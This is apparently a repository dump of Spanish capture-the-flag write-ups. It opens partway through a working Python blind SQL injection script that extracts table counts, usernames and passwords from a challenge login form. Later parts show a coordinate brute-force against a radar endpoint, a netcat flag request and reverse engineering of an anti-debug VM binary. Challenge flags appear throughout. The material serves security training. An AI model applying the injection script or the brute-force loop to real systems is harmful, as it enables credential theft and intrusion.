    p.print_good('MAX TABLES:')

    url='http://34.253.120.147:1730/login'
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    for i in range(0,255):
        username="username=%' OR (SELECT CASE WHEN ((SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' )="+str(i)+") THEN '1' ELSE '0' END)='1&password=1234&submit=Login"
        with requests.Session() as s:
            payload='username=%s&password=1234=&submit=Login' % (username)
            r = s.post(url, data = payload, headers = headers, verify = False, allow_redirects = False)
            cookies=s.cookies.get_dict()
            cookie=cookies['session']
            # Only the first (payload) segment of the cookie is compared; the
            # signature segments are ignored.
            session_payload = cookie.split('.')[0]

            if r.status_code == 302 and session_payload=='eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkluY29ycmVjdCBwYXNzd29yZCBmb3IgdXNlciBQZXBpIl19XX0':
                print("\t\t %s tables found." % (i))
                i += 1
                break
36 |
def getMaxUsers():
    """Count the rows in ``users`` with the same redirect/cookie oracle as ``getMaxTables``.

    Returns:
        ``i`` after the increment that precedes ``break``, i.e. the matched
        count **plus one** (``getUserNames`` compensates with ``maxusers-1``).
        If no value in 0..254 matches, the loop runs out and the last loop
        value, 254, is returned.
    """
    p.print_good('MAX USERS:')

    url='http://34.253.120.147:1730/login'
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    for i in range(0,255):
        username="username=%' OR (SELECT CASE WHEN ((SELECT count(username) FROM users)="+str(i)+") THEN '1' ELSE '0' END)='1&password=1234&submit=Login"
        with requests.Session() as s:
            payload='username=%s&password=1234=&submit=Login' % (username)
            r = s.post(url, data = payload, headers = headers, verify = False, allow_redirects = False)
            cookies=s.cookies.get_dict()
            cookie=cookies['session']
            session_payload = cookie.split('.')[0]

            if r.status_code == 302 and session_payload=='eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkluY29ycmVjdCBwYXNzd29yZCBmb3IgdXNlciBQZXBpIl19XX0':
                print("\t\t %s users found." % (i))
                i += 1
                break
    return i
56 |
def getUserNames(maxusers=3):
    """Recover the first five characters of each username, one character per oracle hit.

    Usernames are addressed by ``ORDER BY username asc ... OFFSET u``; positions
    are probed with ``substr(username, i, 1)`` against every ``string.printable``
    character, using the same redirect/cookie oracle as ``getMaxTables``.

    Args:
        maxusers: value returned by ``getMaxUsers`` (count + 1); the loop runs
            ``maxusers-1`` times, i.e. once per user.

    Returns:
        list of recovered usernames (at most five characters each).

    NOTE(review): ``i`` only advances on a match, so a position whose real
    character is never matched (e.g. one of the metacharacters blanked to
    ``''`` below) would keep the ``while`` loop spinning.
    """
    p.print_good('USERNAMES:')
    users=[]

    url='http://34.253.120.147:1730/login'
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}

    for u in range(0,maxusers-1):
        db_username=''
        p.print_info("User: "+str(u+1))
        i=1
        while i <= 5:
            for c in string.printable:
                # These characters are not probed; the candidate is blanked
                # instead of skipped, so an empty-string comparison is sent.
                if c in ['*','+','.','?','|','&', '$', '\\']:
                    c = ''
                username="username=%' OR (SELECT CASE WHEN ((SELECT substr(username,"+str(i)+",1) FROM users ORDER BY username asc LIMIT 1 OFFSET "+str(u)+")='"+c+"') THEN '1' ELSE '0' END)='1&password=1234&submit=Login"
                print("\t\t\t[+] Character:" + c)
                with requests.Session() as s:
                    payload='username=%s&password=1234=&submit=Login' % (username)
                    r = s.post(url, data = payload, headers = headers, verify = False, allow_redirects = False)
                    cookies=s.cookies.get_dict()
                    cookie=cookies['session']
                    session_payload = cookie.split('.')[0]

                    if r.status_code == 302 and session_payload=='eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkluY29ycmVjdCBwYXNzd29yZCBmb3IgdXNlciBQZXBpIl19XX0':
                        p.print_good("Username character found: %s" % (db_username+c))
                        db_username += c
                        i += 1
                        # Next position; leaves the character loop only.
                        break
        users.append(db_username)
    return users
88 |
def getPasswordsHex(users):
    """Recover each user's stored password byte by byte, comparing hex values.

    For positions 1..59 every byte value 0..254 is tested with
    ``hex(substr(password, i, 1)) = printf('%X', c)``, using the same
    redirect/cookie oracle as ``getMaxTables``.  Matched bytes are echoed as
    they are found; when position 60 is reached the collected bytes (except
    the first one, see ``[1:]``) are decoded and printed.

    Args:
        users: list of usernames, normally from ``getUserNames``.

    Returns:
        ``None``; output goes to the console only.

    NOTE(review): ``db_password`` is never used and ``db_username`` here
    accumulates the hex of the *password*, not a username.
    """
    db_username=''
    db_password=''
    #usernames=["Pepi","Luci","Bom"]
    usernames=users
    p.print_info('Usernames to process: [%s]' % ', '.join(map(str, usernames)))
    p.print_good('PASSWORDS:')
    for user in usernames:
        db_username=''
        db_username_array=[]
        p.print_good("USERNAME: "+user)
        print("\t\t",end="",flush=True)
        url='http://34.253.120.147:1730/login'
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        i=1
        while i <= 60:
            #pb_passhex=tqdm(total=60,desc="DB Password")
            for c in range(0,255):
                username="username=%' OR (SELECT CASE WHEN ((SELECT hex(substr(password,"+str(i)+",1)) FROM users WHERE username='"+user+"' ORDER BY username asc LIMIT 1)=printf('%X', "+str(hex(c))+")) THEN '1' ELSE '0' END)='1&password=1234&submit=Login"

                with requests.Session() as s:
                    payload='username=%s&password=1234=&submit=Login' % (username)
                    #print(payload)
                    r = s.post(url, data = payload, headers = headers, verify = False, allow_redirects = False)
                    cookies=s.cookies.get_dict()
                    cookie=cookies['session']
                    session_payload = cookie.split('.')[0]
                    if r.status_code == 302 and session_payload=='eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkluY29ycmVjdCBwYXNzd29yZCBmb3IgdXNlciBQZXBpIl19XX0':
                        # Echo the matched byte as a character, no newline.
                        print(chr(int(hex(c),16)), sep='', end='',flush=True)
                        #if i % 10==0:
                        #    print("\t"+"["+str(i)+"] Username character found: %s" % (db_username+" "+str(hex(c))))
                        db_username += " "+str(hex(c))
                        db_username_array.append(str(hex(c)))
                        #pb_passhex.update(1.666667)
                        i += 1
                        if i == 60:
                            p.print_good(" HEX-DECODED PASSWORD:"+''.join(chr(int(char, 16)) for char in db_username_array[1:]))
                        break
            #pb_passhex.close()
128 |
def _main():
    """Run the four probe stages in order; each later stage consumes the previous result."""
    p.print_title("UAM BreakingBad 001 - Blind SQLi")
    getMaxTables()
    user_count = getMaxUsers()
    names = getUserNames(user_count)
    getPasswordsHex(names)


if __name__ == '__main__':
    _main()
135 |
136 |
137 |
--------------------------------------------------------------------------------
/writeups/breakingbad/episodio1/masi/masi - UAM_BreakingBad_EP1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/breakingbad/episodio1/masi/masi - UAM_BreakingBad_EP1.pdf
--------------------------------------------------------------------------------
/writeups/breakingbad/episodio2/arsenics/Arsenics_Breaking bad episode 2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/breakingbad/episodio2/arsenics/Arsenics_Breaking bad episode 2.pdf
--------------------------------------------------------------------------------
/writeups/breakingbad/episodio2/masi/masi - UAM_BreakingBad_EP2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/breakingbad/episodio2/masi/masi - UAM_BreakingBad_EP2.pdf
--------------------------------------------------------------------------------
/writeups/breakingbad/episodio3/j0n3/Breaking Bad - Episodio 3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/breakingbad/episodio3/j0n3/Breaking Bad - Episodio 3.pdf
--------------------------------------------------------------------------------
/writeups/dragonball/episodio1/M3n0s_D0n4ld/M3n0s_D0n4ld-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio1/M3n0s_D0n4ld/M3n0s_D0n4ld-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/dragonball/episodio1/M3n0s_D0n4ld/a:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/writeups/dragonball/episodio1/bicacaro/bicacaro-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio1/bicacaro/bicacaro-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/dragonball/episodio1/j0n3/j0n3-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio1/j0n3/j0n3-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/dragonball/episodio1/julianjm/julianjm-episodio1.md:
--------------------------------------------------------------------------------
1 | # UAM - Dragon Ball - Episodio 1 - julianjm
2 |
3 | _15/07/2019_
4 |
5 | > Hay web con un radar que indica si una bola está en el rango de detección. La ubicación la obtiene del navegador.
6 | >
7 | > Existe otro servicio que, pasándole el nombre correcto, devuelve la flag.
8 | >
9 | > [Enunciado completo](https://unaalmes.hispasec.com/challenges#EPISODIO%20)
10 |
11 | ## El (mardito) radar
12 |
13 | Al entrar en la página nos pide acceso a la ubicación y vemos un radar con un mensaje que indica nuestras coordenadas y el mensaje "No estás cerca de ninguna bola de dragón"
14 |
15 | Viendo las peticiones que hace la página, usando el inspector de red, vemos que realiza una llamada a server.php, enviando como parámetros lat y lng correspondientes a nuestra ubicación. La respuesta: `{"success":0}`
16 |
17 | Analizamos el código javascript, y vemos, en client.js, una función relevante:
18 |
19 | ```javascript
20 | function showPosition(position) {
21 | $.ajax({
22 | type: "POST",
23 | url: 'server.php',
24 | data: {'lat':position.coords.latitude, 'lng': position.coords.longitude},
25 |
26 | success: function(response) {
27 | var jsonData = JSON.parse(response);
28 | if (jsonData.success != 0) {
29 | output.innerHTML = "¡Estás cerca de la bola de dragón de " + jsonData.stars + " estrella(s)! Se encuentra en "
30 | + jsonData.city + ". (lat: " + jsonData.lat + " / lng: " + jsonData.lng + ")";
31 | document.getElementsByClassName("points")[0].innerHTML = jsonData.locInRadar;
32 | } else if (jsonData.success == 0)
33 | output.innerHTML = "Te encuentras en " + position.coords.latitude + " / " + position.coords.longitude + ". No estás cerca de ninguna bola de dragón.";
34 | }
35 | });
36 | //continua, pero lo imporatnte está arriba
37 | }
38 | ```
39 |
40 | La función `showPosition` se ejecuta cada vez que cambia la ubicación, o cuando se entra por primera vez. Vemos la llamada a `server.php` con los parámetros `lat` y `lng`.
41 |
42 | Cuando estamos cerca de una bola, un dato importante que nos indica es la ciudad en la que se encuentra. Es decir, no están distribuidas al azar por el globo (flat earthers may disagree), sino que se encuentran en ciudades. Supondremos también que están en ciudades importantes a nivel de población (ignoraremos Triquivijate y Calzadilla de los Barros).
43 |
44 | ## Automatización
45 |
46 | No es viable recorrer las principales ciudades del mundo, como si buscásemos Pokemones. La idea es obtener un listado de ciudades del mundo, con sus coordenadas GPS, y realizar peticiones a `server.php`, hasta que demos con las 7 bolas.
47 |
48 | Hay varios listados de ciudades, más o menos completos. El que usé yo fue el básico de esta página: https://simplemaps.com/data/world-cities. Unas 13.000 ciudades. El formato es el siguiente:
49 | ```c
50 | "city","city_ascii","lat","lng","country","iso2","iso3","admin_name","capital","population","id"
51 | "Malishevë","Malisheve","42.4822","20.7458","Kosovo","XK","XKS","Malishevë","admin","","1901597212"
52 | "Prizren","Prizren","42.2139","20.7397","Kosovo","XK","XKS","Prizren","admin","","1901360309"
53 | "Zubin Potok","Zubin Potok","42.9144","20.6897","Kosovo","XK","XKS","Zubin Potok","admin","","1901608808"
54 | "Kamenicë","Kamenice","42.5781","21.5803","Kosovo","XK","XKS","Kamenicë","admin","","1901851592"
55 | "Viti","Viti","42.3214","21.3583","Kosovo","XK","XKS","Viti","admin","","1901328795"
56 | "Shtërpcë","Shterpce","42.2394","21.0272","Kosovo","XK","XKS","Shtërpcë","admin","","1901828239"
57 | "Shtime","Shtime","42.4331","21.0397","Kosovo","XK","XKS","Shtime","admin","","1901598505"
58 | "Vushtrri","Vushtrri","42.8231","20.9675","Kosovo","XK","XKS","Vushtrri","admin","","1901107642"
59 | "Dragash","Dragash","42.0265","20.6533","Kosovo","XK","XKS","Dragash","admin","","1901112530"
60 | ```
61 |
62 | Cargamos a una lista las coordenadas de todas las ciudades:
63 |
64 | ```python
65 | coords = []
66 | with open("worldcities.csv","r") as f:
67 | f.readline()
68 | for line in f:
69 | cols = line.split(",")
70 | lat = float(cols[2].strip('"'))
71 | lng = float(cols[3].strip('"'))
72 | coords.append([lat,lng])
73 | ```
74 |
75 | Definimos la función que hará la petición a server.php:
76 |
77 | ```python
78 | import requests
79 | import time
80 |
81 | URL="https://34.253.120.147/dragonball/episodio1/server.php"
82 |
83 | def check(lat,lng):
84 | data={ "lat":lat, "lng":lng }
85 | try:
86 | r = requests.post(URL, data=data, verify=False)
87 | if "city" in r.text:
88 | print(r.text)
89 | except:
90 | print("Exception.. sleeping 5 secs")
91 | time.sleep(5)
92 | ```
93 |
94 | Por último, iteramos el listado de coordenadas:
95 |
96 | ```python
97 | for lat,lng in coords:
98 | check(lat,lng)
99 | ```
100 |
101 | Al principio la sensibilidad del radar era mucho más limitada, y había que multiplicar el número de peticiones, de forma que se cubriese un área alrededor de cada coordenada. Para no morir en el intento, usamos multithreading (una librería DoS de python):
102 |
103 | ```python
104 | OFFSET=0.015
105 |
106 | POOLSIZE=500
107 |
108 | # Función que procesa hasta POOLSIZE coordenadas, empezando en start
109 | def doit(start):
110 | print("Processing %d starting at %d" % (POOLSIZE, start))
111 | for lat,lng in coords[start:start+POOLSIZE]:
112 | # La coordenada original
113 | check(lat,lng)
114 | # El cuadrado que rodea la coordenada original
115 | check(lat+OFFSET, lng )
116 | check(lat, lng+OFFSET )
117 | check(lat+OFFSET, lng+OFFSET )
118 | check(lat-OFFSET, lng )
119 | check(lat, lng-OFFSET )
120 | check(lat-OFFSET, lng-OFFSET )
121 | check(lat+OFFSET, lng-OFFSET )
122 | check(lat-OFFSET, lng+OFFSET )
123 | # Con un poco más de radio. La M50, vamos.
124 | check(lat , lng + OFFSET*2 )
125 | check(lat , lng - OFFSET*2 )
126 | check(lat + OFFSET*2 , lng )
127 | check(lat - OFFSET*2 , lng )
128 | check(lat + OFFSET*2 , lng + OFFSET*2 )
129 | check(lat + OFFSET*2 , lng - OFFSET*2 )
130 | check(lat - OFFSET*2 , lng + OFFSET*2 )
131 | check(lat - OFFSET*2 , lng - OFFSET*2 )
132 |
133 | # Configuramos el número de subprocesos:
134 | pool = Pool(processes=5)
135 | # Cargamos los trabajos.. de 0 a numero de coordenadas, cada POOLSIZE elementos
136 | pool.map(doit, range(0,len(coords),POOLSIZE))
137 | ```
138 |
139 | Si todo va bien obtenemos las siguientes bolas:
140 |
141 | ```json
142 | {"stars":1,"city":"Damasco","lat":33.513645,"lng":36.276762,"locInRadar":"<\/circle>"}
143 | {"stars":2,"city":"Ronda","lat":36.745473,"lng":-5.161438,"locInRadar":"<\/circle>"}
144 | {"stars":3,"city":"Guam","lat":13.440439,"lng":144.779184,"locInRadar":"<\/circle>"}
145 | {"stars":4,"city":"Ulan Bator","lat":47.906641,"lng":106.895085,"locInRadar":"<\/circle>"}
146 | {"stars":5,"city":"Estocolmo","lat":59.328694,"lng":18.068505,"locInRadar":"<\/circle>"}
147 | {"stars":6,"city":"Reikiavik","lat":64.145144,"lng":-21.942496,"locInRadar":"<\/circle>"}
148 | {"stars":7,"city":"Odessa","lat":46.482921,"lng":30.722892,"locInRadar":"<\/circle>"}
149 | ```
150 |
151 | ## Gimme tha flag
152 |
153 | Comprobamos el nombre (DRGUERO), usando el servicio del puerto 9999:
154 |
155 | ```bash
156 | $ echo DRGUERO | nc 34.253.120.147 9999
157 | UAM{2f3c45a7fdd272de9f43836e5ca2f39c}
158 | ```
159 |
160 | Como curiosidad, el inverso de ese md5 es: OPR4d4rftw
161 |
162 |
163 | ## Spam
164 |
165 | [Julian J. M.](https://julianjm.com)
166 |
--------------------------------------------------------------------------------
/writeups/dragonball/episodio1/nachinho3/nachinho3-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio1/nachinho3/nachinho3-episodio1.pdf
--------------------------------------------------------------------------------
/writeups/dragonball/episodio2/j0n3/j0n3-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio2/j0n3/j0n3-episodio2.pdf
--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/bicacaro/bicacaro-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/bicacaro/bicacaro-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/julianjm/img/uam_he_visto_cosas.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/julianjm/img/uam_he_visto_cosas.jpg
--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/julianjm/img/uam_init_array.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/julianjm/img/uam_init_array.png
--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/julianjm/img/uam_malloc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/julianjm/img/uam_malloc.png
--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/julianjm/img/uam_vector_constructor.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/julianjm/img/uam_vector_constructor.png
--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/julianjm/img/uam_xd_cmp_eq.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/julianjm/img/uam_xd_cmp_eq.png
--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/julianjm/img/uam_xd_run.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/julianjm/img/uam_xd_run.png
--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/julianjm/img/uam_xd_xd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/julianjm/img/uam_xd_xd.png
--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/julianjm/julianjm-episodio3.md:
--------------------------------------------------------------------------------
1 | # UAM - Dragon Ball 3 - 15/10/2019 - julianjm
2 |
3 | ## Enunciado
4 | [Versión completa](https://unaalmes.hispasec.com/challenges#EPISODIO%203). Nos proporcionan un binario ELF64 para analizar e intentar descubrir la flag.
5 |
6 | ## Análisis inicial
7 | A primera vista, tenemos una función `main` de lo más sencillo. Inicializa un array con una serie de valores, les hace un XOR con un valor en la función `decrypt` y utiliza ese resultado para compararlo con la entrada del programa.
8 |
9 | Nos damos cuenta rápido de que no todo va a ser tan fácil (n0t_s0_34sY). Por alguna razón está fallando la comparación de cadenas con strcmp, pero solamente cuando _no_ estamos en modo debug. Lo único que tenemos claro es la longitud de la flag, 11.
10 |
11 | 
12 |
13 | ## glibc __init_array
14 |
15 | Pasan cosas antes del `main`. Durante la inicialización de la libc se ejecutan diversas funciones, entre ellas las definidas en la sección `__init_array` del ELF. Aquí está, por ejemplo, la ejecución de constructores de los objetos declarados de forma global, que tienen que estar inicializados cuando se empiece a ejecutar `main`.
16 |
17 | 
18 |
19 | Tirando del hilo llegamos al constructor de la clase vector, que no hace otra cosa que reemplazar la función `strcmp`, usada para comparar la flag en la función `main`, por otra que analizaremos más adelante.
20 |
21 | 
22 |
23 | Este reemplazo, no obstante, solo ocurre bajo cierta condición, que no existan en la sección de código más de 6 bytes de valor `0xCC`. Este byte codifica la instrucción `int 3`, que es utilizada por los debugger para meter breakpoints por software. De esta forma, si hemos definido alguno (por ejemplo al inicio del `main`), el número de bytes será superior a 6 y no reemplazará nada, dejándonos un poco locker.
24 |
25 | Una solución, es utilizar breakpoints por hardware, aunque están limitados en número. Estos breakpoints se basan en registros de la CPU y no en la modificación de la memoria para incluir llamadas a `int 3`, por lo que no serían detectados por esta técnica antidebugging.
26 |
27 | ## VM
28 |
29 | Llegados a este punto podemos debugear la función reemplazo de `strcmp`. Esta función crea una secuencia de enteros, en los que inserta el string que recibe como primer parámetro. Posteriormente crea un objeto de la clase `xd`, en cuyo constructor sucede la magia.
30 |
31 | 
32 |
33 | 
34 |
35 | Se trata de una máquina virtual, que evalúa una cadena de código formada por opcodes y datos. Hay diferentes opcodes definidos, JMP, MOVRV, XOR, EQ, JMP_NEQ. Analizando cada función, vemos qué datos utiliza y cómo los procesa. La operación `EQ`, por ejemplo, establece un registro interno a 1 si la igualdad (entre un valor definido en la instrucción y un valor de la memoria) es cierta.
36 |
37 | 
38 |
39 | Un pequeño script en python nos permitirá ver el código más claramente en un formato similar al ensamblador. Como la flag forma parte del código, utilizaremos para este desensamblado una flag incorrecta: "123456789ab"
40 |
41 | ``` as
42 | 0: JMP 3
43 | 2: RETURN
44 | 3: MOVRV mem[0], 11 # La longitud de la flag
45 | 6: EQ mem[0], 11
46 | 9: JMP_NEQ 2
47 | 11: MOVRV mem[0], 49 # Primer caracter de la flag, '0'
48 | 14: XOR [0], 210
49 | 17: EQ mem[0], 149
50 | 20: JMP_NEQ 2
51 | 22: MOVRV mem[0], 50 # Segundo caracter de la flag '1'
52 | 25: XOR mem[0], 214
53 | 28: EQ mem[0], 230
54 | 31: JMP_NEQ 2
55 | 33: MOVRV mem[0], 51
56 | 36: XOR mem[0], 135
57 | 39: EQ mem[0], 211
58 | 42: JMP_NEQ 2
59 | 44: MOVRV mem[0], 52
60 | 47: XOR mem[0], 234
61 | 50: EQ mem[0], 181
62 | 53: JMP_NEQ 2
63 | 55: MOVRV mem[0], 53
64 | 58: XOR mem[0], 212
65 | 61: EQ mem[0], 188
66 | 64: JMP_NEQ 2
67 | 66: MOVRV mem[0], 54
68 | 69: XOR mem[0], 2
69 | 72: EQ mem[0], 50
70 | 75: JMP_NEQ 2
71 | 77: MOVRV mem[0], 55
72 | 80: XOR mem[0], 27
73 | 83: EQ mem[0], 43
74 | 86: JMP_NEQ 2
75 | 88: MOVRV mem[0], 56
76 | 91: XOR mem[0], 9
77 | 94: EQ mem[0], 98
78 | 97: JMP_NEQ 2
79 | 99: MOVRV mem[0], 57
80 | 102: XOR mem[0], 172
81 | 105: EQ mem[0], 157
82 | 108: JMP_NEQ 2
83 | 110: MOVRV mem[0], 97
84 | 113: XOR mem[0], 16
85 | 116: EQ mem[0], 126
86 | 119: JMP_NEQ 2
87 | 121: MOVRV mem[0], 98
88 | 124: XOR mem[0], 170
89 | 127: EQ mem[0], 205
90 | 130: JMP_NEQ 2
91 | 132: MOVRV mem[19], 1
92 | 135: RETURN
93 | ```
94 |
95 | Vemos que la primera comprobación que realiza es si la longitud de la flag suministrada es igual a 11. En caso contrario, saltaría a la posición 2 y retornaría. El registro interno valdría 0 en este punto, por lo que la función retornaría incorrecto.
96 |
97 | Posteriormente, carga en memoria el valor 49, correspondiente al primer carácter de la flag, en el ejemplo '0'. Le realiza una operación XOR con el valor 210 y compara el resultado con 149. Si coincide, pasa a analizar el siguiente carácter. Para averiguar el carácter necesario para que la comparación sea correcta, nos basta con realizar la operación 149 xor 210, que da como resultado 71. En ASCII corresponde al carácter 'G'.
98 |
99 | Repitiendo la operación con el resto de la flag, obtenemos: *G0T_h00k1ng*
100 |
101 | Convertimos al formato habitual (md5), y tenemos la flag definitiva:
102 |
103 | UAM{7b02cd3d2d3cea80359cf600799413d3}
104 |
--------------------------------------------------------------------------------
/writeups/dragonball/episodio3/nachinho3/nachinho3-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/dragonball/episodio3/nachinho3/nachinho3-episodio3.pdf
--------------------------------------------------------------------------------
/writeups/extra/extra/arsenics/arsenics-easymode.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/extra/extra/arsenics/arsenics-easymode.pdf
--------------------------------------------------------------------------------
/writeups/extra/extra/darkeagle/darkeagle-easymode.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/extra/extra/darkeagle/darkeagle-easymode.pdf
--------------------------------------------------------------------------------
/writeups/extra/extra/j0n3/j0n3-easymode.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/extra/extra/j0n3/j0n3-easymode.pdf
--------------------------------------------------------------------------------
/writeups/futurama/episodio3-1/arsenics/futurama3.1-bof-Arsenics.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/futurama/episodio3-1/arsenics/futurama3.1-bof-Arsenics.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/alejandroparras/alejandroparras-episodio1-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-1/alejandroparras/alejandroparras-episodio1-1.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/bicacaro/bicacaro-episodio1-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-1/bicacaro/bicacaro-episodio1-1.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/darkeagle/darkeagle-episodio1-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-1/darkeagle/darkeagle-episodio1-1.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/j0n3/j0n3-episodio1-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-1/j0n3/j0n3-episodio1-1.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/nachinho3/nachinho3-episodio1-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-1/nachinho3/nachinho3-episodio1-1.pdf
--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/oreos/oreos-episodio1-1.txt:
--------------------------------------------------------------------------------
1 | NICK: oreos
2 |
3 | SOLUCION: EPISODIO 1 - 1ª PARTE
4 |
5 | 1. Accedemos a la URL de la caja fuerte: http://34.253.233.243/lacasadepapel/episodio1.
6 |
7 | 2. Revisamos el código fuente, y encontramos un javascript interesante, 'login.js'.
8 |
9 | /*
10 |
11 | function conexion(){
12 | var Password = "unescape%28String.fromCharCode%252880%252C%2520108%252C%252097%252C%2520110%2529%29:KZQWYZLOMNUWC===";
13 | for (i = 0; i < Password.length; i++)
14 | {
15 | if (Password[i].indexOf(code1) == 0)
16 | {
17 | var TheSplit = Password[i].split(":");
18 | var code1 = TheSplit[0];
19 | var code2 = TheSplit[1];
20 | }
21 | }
22 |
23 | */
24 |
25 | 3. Observamos que se realiza un split a la cadena "Password" con el delimitador ':' para obtener code1 y code2.
26 |
27 | code1 = unescape%28String.fromCharCode%252880%252C%2520108%252C%252097%252C%2520110%2529%29 = unescape(String.fromCharCode(80, 108, 97, 110)) = Plan
28 | code2 = DecodeBase32(KZQWYZLOMNUWC===) = Valencia
29 |
30 | 4. Insertamos los códigos en la página de la caja fuerte: http://34.253.233.243/lacasadepapel/episodio1.
31 |
32 | El codigo para descomprimir el zip es:
33 | PR0F3S0R&R10
34 |
35 | 5. Descomprimimos el zip usando el password obtenido.
36 |
37 | $ 7z e episodio1.zip
38 |
39 | 6. Ejecutamos con wine:
40 |
41 | $ WINEPREFIX=~/.wine64 wine episodio1.exe
42 | System_Date: 05/15/18
43 | Wrong date R3m0!
44 |
45 | -------------HINT---------------------
46 | 'La persistencia de la memoria...'
47 | --------------------------------------
48 | Pulse cualquier tecla para continuar...
49 |
50 | 7. Usamos radare2 para realizar un análisis estático, y observamos que se realiza una comparación de la fecha actual con el 23 de enero de 1989 (cadena 01/23/89) en MD5 (observar adjuntos condition.png, win.png y lose.png). Cambiamos la fecha y obtenemos el flag:
51 |
